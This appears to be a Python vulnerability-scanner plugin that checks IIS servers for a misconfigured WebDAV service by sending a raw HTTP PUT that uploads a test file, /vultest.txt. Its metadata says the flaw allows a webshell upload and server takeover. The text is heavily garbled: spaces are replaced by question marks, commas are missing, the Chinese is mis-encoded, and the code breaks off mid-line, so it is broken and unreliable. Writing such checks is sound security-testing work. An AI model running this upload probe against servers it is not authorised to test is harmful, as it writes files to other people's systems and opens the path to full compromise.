?#!/usr/bin/env?python
#?-*-?coding:utf-8?-*-

‘‘‘
????name:?IIS?WebDav
????info:?“開(kāi)啟了WebDav且配置不當(dāng)可導(dǎo)致攻擊者直接上傳webshell，進(jìn)而導(dǎo)致服務(wù)器被入侵控制。
????level:?緊急
????type:?任意文件上傳
????repair:?禁用?IIS?的?WebDAV?服務(wù)
‘‘‘

import?sysos
import?socketurllib2time
from?POC_framework?import?POC

class?myPOC10（POC）:
????
????#單IP的POC
????def?check（self?ip?port?timeout=5）:
????????try:
????????????socket.setdefaulttimeout（timeout）
????????????s?=?socket.socket（socket.AF_INET?socket.SOCK_STREAM）
????????????s.connect（（ip?port））
????????????flag?=?“PUT?/vultest.txt?HTTP/1.1\r\nHost:?%s:%d\r\nContent-Length:?9\r\n\r\nscan\r\n\r\n“?%?（ip?port）
????????????s.send（flag）
????????????time.sleep（1）
????????????data?=?s.rec